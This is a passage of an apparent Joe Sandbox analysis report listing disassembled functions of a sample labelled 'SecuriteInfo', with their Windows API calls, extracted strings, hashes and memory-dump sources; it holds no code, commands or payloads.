                                                    • Instruction ID: e486e64a22fcd2b3c92b583acd144241f2a10e2e8491b06c503465ad0541b6f5
                                                    • Opcode Fuzzy Hash: eb770c94da59cce8c7f026b3e7840fcd5a3ec8b5b2dcce5e66222e3bc4469f49
                                                    • Instruction Fuzzy Hash: C7515F72D041199FDB21CF68DD49B9EBBB9FB48710F25522AE815E3291DB30AD00CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0042A630: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0042A671
                                                    • GetLastError.KERNEL32(D13B3340,?,?,?,005921DD,000000FF,?,00484362,?), ref: 004A113D
                                                    • GetProcAddress.KERNEL32(00000000,GetPackagePath), ref: 004A12CD
                                                    • GetProcAddress.KERNEL32(00000000,GetPackagePath), ref: 004A1326
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,005921DD,000000FF,?,00484362,?), ref: 004A1414
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$DirectoryErrorFreeLastLibrarySystem
                                                    • String ID: GetPackagePath$Kernel32.dll$neutral$x64$x86
                                                    • API String ID: 2155880084-4043905686
                                                    • Opcode ID: 6133a6ee80fc06ef81044898710b67c4996b831ee09905e1f625ade6182a8713
                                                    • Instruction ID: 9fd08c1691975b9f844d4b661dbf80c060d9f93226e2dd1cc8ff1ba0e05c41b2
                                                    • Opcode Fuzzy Hash: 6133a6ee80fc06ef81044898710b67c4996b831ee09905e1f625ade6182a8713
                                                    • Instruction Fuzzy Hash: C3C18D70A00209DFDF04CFA8C984B9EBBB1FF1A314F148269E805EB3A1EB759945CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00476E80: LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,00482271,?,D13B3340,?,?), ref: 00476E9B
                                                      • Part of subcall function 00476E80: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00476EB1
                                                      • Part of subcall function 00476E80: FreeLibrary.KERNEL32(00000000), ref: 00476EEA
                                                    • GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104,D13B3340,?,?), ref: 00482450
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressEnvironmentFreeLoadProcVariable
                                                    • String ID: AI_BOOTSTRAPPERLANGS$APPDATA$AppDataFolder$PROGRAMFILES$ProgramFiles$ProgramFilesFolder$Shell32.dll$Shlwapi.dll
                                                    • API String ID: 788177547-1020860216
                                                    • Opcode ID: 8c7e077d2cce1d14b5c128a4a509878a5a29ca19a7780b800cdbbf8c267c5533
                                                    • Instruction ID: f234b90313971f3a86adb9e79c47c006286d86406bdbe5a9fea1adee3345a2bc
                                                    • Opcode Fuzzy Hash: 8c7e077d2cce1d14b5c128a4a509878a5a29ca19a7780b800cdbbf8c267c5533
                                                    • Instruction Fuzzy Hash: B1913370A002059FDB14EF64CD59BAFB7A6FF20310F1049AAE80697391EB799E45CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,ps1,ps1,00000003,?,00484B98), ref: 004A6983
                                                    • WriteFile.KERNEL32(00000000,0000FEFF,00000002,?,00000000), ref: 004A69C7
                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 004A69E4
                                                    • CloseHandle.KERNEL32(00000000), ref: 004A69FE
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 004A6A3D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$CloseHandleInit_thread_footerWrite$CreateFindHeapProcessResource
                                                    • String ID: <3[$Unable to get temp file $Unable to save script file $ps1
                                                    • API String ID: 2821137686-4084439290
                                                    • Opcode ID: 527ff08d428b9134feb5de8a5ce82c361365cafd9b3bbe141d967c1cdcb75b07
                                                    • Instruction ID: edf51454c17da5db46760b27dd7ad38f0f2cbdd35c41f3a79f1e9ccef9451750
                                                    • Opcode Fuzzy Hash: 527ff08d428b9134feb5de8a5ce82c361365cafd9b3bbe141d967c1cdcb75b07
                                                    • Instruction Fuzzy Hash: 3D51E770900649AFDB10CB68CD49FAFBBB8BF16314F148259E501BB3D1D7749A08DBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 0036D18F
                                                      • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
                                                      • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
                                                      • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
                                                    • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?,D13B3342), ref: 0036D1E3
                                                    • CloseHandle.KERNEL32(00000000), ref: 0036D240
                                                      • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
                                                      • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0036D2A7
                                                    • CloseHandle.KERNEL32(00000000,0051D0EC), ref: 0036D2CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$CloseEnterFileHandleLeave$ConditionCreateInit_thread_footerVariableWakeWrite
                                                    • String ID: <3[$aix$html$c
                                                    • API String ID: 2030708724-1035274146
                                                    • Opcode ID: 03e123876c288a6aa4bcc644e3764086c792d05d1e112bfe4b7c06a0ccf0999f
                                                    • Instruction ID: 36d6a91bf5a193867c6be48c045a258dd784980b4fe01ccb0fc1623d09a4bd8a
                                                    • Opcode Fuzzy Hash: 03e123876c288a6aa4bcc644e3764086c792d05d1e112bfe4b7c06a0ccf0999f
                                                    • Instruction Fuzzy Hash: 0D618DB0900248DFEB10CF94DC58BDEBBF5FB55708F109519E402AB2D5DBB96A09CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 00523C17
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00523C1F
                                                    • _ValidateLocalCookies.LIBCMT ref: 00523CA8
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00523CD3
                                                    • _ValidateLocalCookies.LIBCMT ref: 00523D28
                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00523D3E
                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00523D53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                    • String ID: `{5$csm
                                                    • API String ID: 1385549066-992564086
                                                    • Opcode ID: 877fadb79fc3c82a33a927fad4464b999f326b82d2fb8914fdb3fdb2d1d520fb
                                                    • Instruction ID: 04d9aca428d2aa458b5beedc61a3193e1d7a31fec1882b174580de51a917cc03
                                                    • Opcode Fuzzy Hash: 877fadb79fc3c82a33a927fad4464b999f326b82d2fb8914fdb3fdb2d1d520fb
                                                    • Instruction Fuzzy Hash: 01417134A002299BCF10DF68E849AAEBFB5BF86324F148155E9147B3D2DB359E05CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,D13B3340), ref: 004703B9
                                                    • ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,00001000), ref: 0047042B
                                                    • ReadFile.KERNEL32(?,00000000,00001000,00000000,00000000,?,?,00000000), ref: 004706CC
                                                    • CloseHandle.KERNEL32(?), ref: 0047072A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$Read$CloseCreateHandle
                                                    • String ID: <3[
                                                    • API String ID: 1724936099-3672254634
                                                    • Opcode ID: e4bdafb98206bf9876f8ae9ec297813ba6fd2b143202fb4bc671199aaac7e267
                                                    • Instruction ID: 2a4b33a2584f38b8b91f0ad0c759d7cb08d027c7a0dc6a7baafa297d63d3c204
                                                    • Opcode Fuzzy Hash: e4bdafb98206bf9876f8ae9ec297813ba6fd2b143202fb4bc671199aaac7e267
                                                    • Instruction Fuzzy Hash: B5D19071D01318DBDB20CFA4C958BEEBBB5BF45304F20821EE419AB381D778AA45CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000), ref: 0045434F
                                                    • CloseHandle.KERNEL32(00000000), ref: 00454377
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 004543B9
                                                    • CloseHandle.KERNEL32(?), ref: 0045440E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseFileHandle$CreateWrite
                                                    • String ID: .bat$<3[$EXE$open
                                                    • API String ID: 3602564925-3266170225
                                                    • Opcode ID: bfdf1a2eefca25c42285be23db06b58d8845ea698f91426622d74253b9a105e1
                                                    • Instruction ID: 5288822706d2ccf92fb0869b2f1d286fbf3cb11d90d553792ed1903d2e347be2
                                                    • Opcode Fuzzy Hash: bfdf1a2eefca25c42285be23db06b58d8845ea698f91426622d74253b9a105e1
                                                    • Instruction Fuzzy Hash: 56A1AE30901648DFEB10CFA8CD48B9EBBB4FF45319F148259E805AB292DB749D48CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemDefaultLangID.KERNEL32 ref: 0049573C
                                                    • GetUserDefaultLangID.KERNEL32 ref: 00495749
                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 0049575B
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemDefaultUILanguage), ref: 0049576F
                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00495784
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressDefaultLangProc$LibraryLoadSystemUser
                                                    • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll
                                                    • API String ID: 667524283-3528650308
                                                    • Opcode ID: fdb024d1bee2d34caf9b51d0821e418a8852a913e701ddc0599cdcf104913b89
                                                    • Instruction ID: 2f1538b3933b9d5964379a16a8d7c4bd861395c8b890be4fe72c17403f5ef127
                                                    • Opcode Fuzzy Hash: fdb024d1bee2d34caf9b51d0821e418a8852a913e701ddc0599cdcf104913b89
                                                    • Instruction Fuzzy Hash: 0E41BF70A04701DFCB45EF25D85067ABBE1BFE8315FA1192EE885C3240EB38D959CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000000,?,?,?,?), ref: 004A175A
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    • ResetEvent.KERNEL32(00000000,D13B3340,?,?,00000000,005922FD,000000FF,?,80004005), ref: 004A17EF
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,005922FD,000000FF,?,80004005), ref: 004A180F
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,005922FD,000000FF,?,80004005), ref: 004A181A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: HeapInit_thread_footerObjectSingleWait$AllocateDeleteEventFileFindProcessResetResource
                                                    • String ID: TEST$[mT$tin9999.tmp
                                                    • API String ID: 3248508590-2527398882
                                                    • Opcode ID: 487519d86baef60bff965968b73f7cb334ac9b304ed6503ba77304acec6401ac
                                                    • Instruction ID: ded1a3e76ea5a4f4d8eaa95fb0458a96632a8fb8dc40ec02c27ba65bad269ade
                                                    • Opcode Fuzzy Hash: 487519d86baef60bff965968b73f7cb334ac9b304ed6503ba77304acec6401ac
                                                    • Instruction Fuzzy Hash: 38C1D375900649DFDB14DF68CC04BAEBBB8FF15320F14426EE816AB3A0DB749A04CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,D13B3340), ref: 0046A404
                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 0046A414
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0046A45D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressCloseHandleModuleProc
                                                    • String ID: <;\$Advapi32.dll$RegOpenKeyTransactedW
                                                    • API String ID: 4190037839-1946468692
                                                    • Opcode ID: 5b8ab8276393106f715fd76807c32ede4723b6475081d819982b0c0a8d78dfd4
                                                    • Instruction ID: f5a75aed15a74842a06362dc4d18ac6c99a839bb163d217bf4ecd9e6d37ddac6
                                                    • Opcode Fuzzy Hash: 5b8ab8276393106f715fd76807c32ede4723b6475081d819982b0c0a8d78dfd4
                                                    • Instruction Fuzzy Hash: 64A16B70D00708DFDB14CFA8C959B9EBBF4BF45304F10865AE805AB391EB78A954CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 00359785
                                                    • __Init_thread_footer.LIBCMT ref: 003597D0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: </a>$<a href="$<a>$hc$hc
                                                    • API String ID: 1385522511-1797644468
                                                    • Opcode ID: 2e21edfcf3924b96d9a1936da6f149511013ccdcf75bc0d0f7f0537965138a26
                                                    • Instruction ID: 6627db8ad94c6fa3bfeed8194a6ad603cdb64fd830d07ef84c54bbd5fa72c4a7
                                                    • Opcode Fuzzy Hash: 2e21edfcf3924b96d9a1936da6f149511013ccdcf75bc0d0f7f0537965138a26
                                                    • Instruction Fuzzy Hash: 2191B270A00304EFDB05DF68D845FADB7B6FF49315F11461AE815AB2E1EB31A949CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 00360F61
                                                      • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
                                                      • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
                                                      • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W), ref: 00360FAA
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00360FB1
                                                    • __Init_thread_footer.LIBCMT ref: 00360FC5
                                                      • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
                                                      • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
                                                    • GetTempPathW.KERNEL32(00000104,?,D13B3340,?), ref: 00360FF2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterInit_thread_footerLeave$AddressConditionHandleModulePathProcTempVariableWake
                                                    • String ID: GetTempPath2W$Kernel32.dll
                                                    • API String ID: 3676318360-1983778095
                                                    • Opcode ID: 2bdab100c7f8269819ebc1e4534e77de692e3a35114021b07339494aeec88a91
                                                    • Instruction ID: 9b31f1444a20274967905f912331a9f60e23e22e51be0dfc765100b0775cb928
                                                    • Opcode Fuzzy Hash: 2bdab100c7f8269819ebc1e4534e77de692e3a35114021b07339494aeec88a91
                                                    • Instruction Fuzzy Hash: F581D4B1D00208EFDB24DF98DC4AB9EBBB4FB54710F1042A9E505A72D1DB756A44CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$HeapProcess
                                                    • String ID: [mT$emT
                                                    • API String ID: 275895251-408856089
                                                    • Opcode ID: bd8b55cf5908c99e9ce5d6dc584a9d34acdf3d6d91027e663f06f7046c8c080b
                                                    • Instruction ID: c6caa7667e2e1c9b3d4176b58b1763862cf113c045c072546523b04ae8d2957a
                                                    • Opcode Fuzzy Hash: bd8b55cf5908c99e9ce5d6dc584a9d34acdf3d6d91027e663f06f7046c8c080b
                                                    • Instruction Fuzzy Hash: 94815B71901209DFDF10CFA8C988B9EBBF5FF99324F148269E914AB391C7B49904DB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetLastError.KERNEL32(0000000E,D13B3340,?,?,00000000,?), ref: 0036908E
                                                    • GetCurrentThreadId.KERNEL32 ref: 003690CF
                                                    • EnterCriticalSection.KERNEL32(0063E7BC), ref: 003690EF
                                                    • LeaveCriticalSection.KERNEL32(0063E7BC), ref: 00369113
                                                    • CreateWindowExW.USER32(00000000,00000000,00000000,0063E7BC,?,80000000,00000000,80000000,00000000,00000000,00000000), ref: 0036916E
                                                      • Part of subcall function 0051FA13: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00495F3E,?,?,?,?,?,?), ref: 0051FA18
